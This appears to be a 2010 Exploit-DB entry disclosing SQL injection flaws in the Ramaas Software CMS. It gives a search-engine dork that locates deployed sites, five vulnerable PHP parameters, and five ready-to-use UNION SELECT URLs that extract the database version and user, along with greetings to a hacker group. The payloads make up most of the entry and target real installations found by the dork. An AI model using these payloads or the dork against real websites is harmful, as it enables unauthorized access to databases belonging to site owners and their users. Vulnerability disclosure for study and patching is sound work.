Ramaas Software CMS - SQL Injection

EDB-ID:

12412

CVE:

N/A




Platform:

PHP

Date:

2010-04-27


# Exploit Title: Ramaas Software CMS SQL Injection Vulnerability
# Version: Web Application
# Tested on: Apcahe/Unix
# Dork : intext:"Powered by Ramaas Software"
# Code :
---------------------------------------------------------------------------------------
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################


This Is The CMS Created by The Leading WebDevelopment Company ramaas.com For
There Clients and all have same

vulnerability.....

Exploited Link :

1) http://example.com/display_agents.php?id=243'

2) http://example.com/view.php?articleid=14567'

3) http://example.com/view_businessnews.php?articleid=7'

4) http://example.com/view_article.php?articleid=12242'

5) http://example.com/article.php?articleid=111'


Demo :

1)
http://example.com/display_agents.php?id=-243+union+select+all+1,2,3,version(),5,user(),7,8--

2)
http://example.com/view.php?articleid=-14567+union+select+all+1,2,3,version(),5,user(),7,8,9,10--

3)
http://example.com/view_businessnews.php?articleid=-7+union+select+all+1,2,3,version(),user(),6,7,8,9--

4)
http://example.com/view_article.php?articleid=-12242+union+select+all+1,2,3,version(),user(),6,7,8,9--

5)
http://example.com/article.php?articleid=-111+union+select+all+1,2,3,version(),5,user(),7,8,9,10,11--



#41.w4r10r mailto:41.w4r10r@andhrahackers.com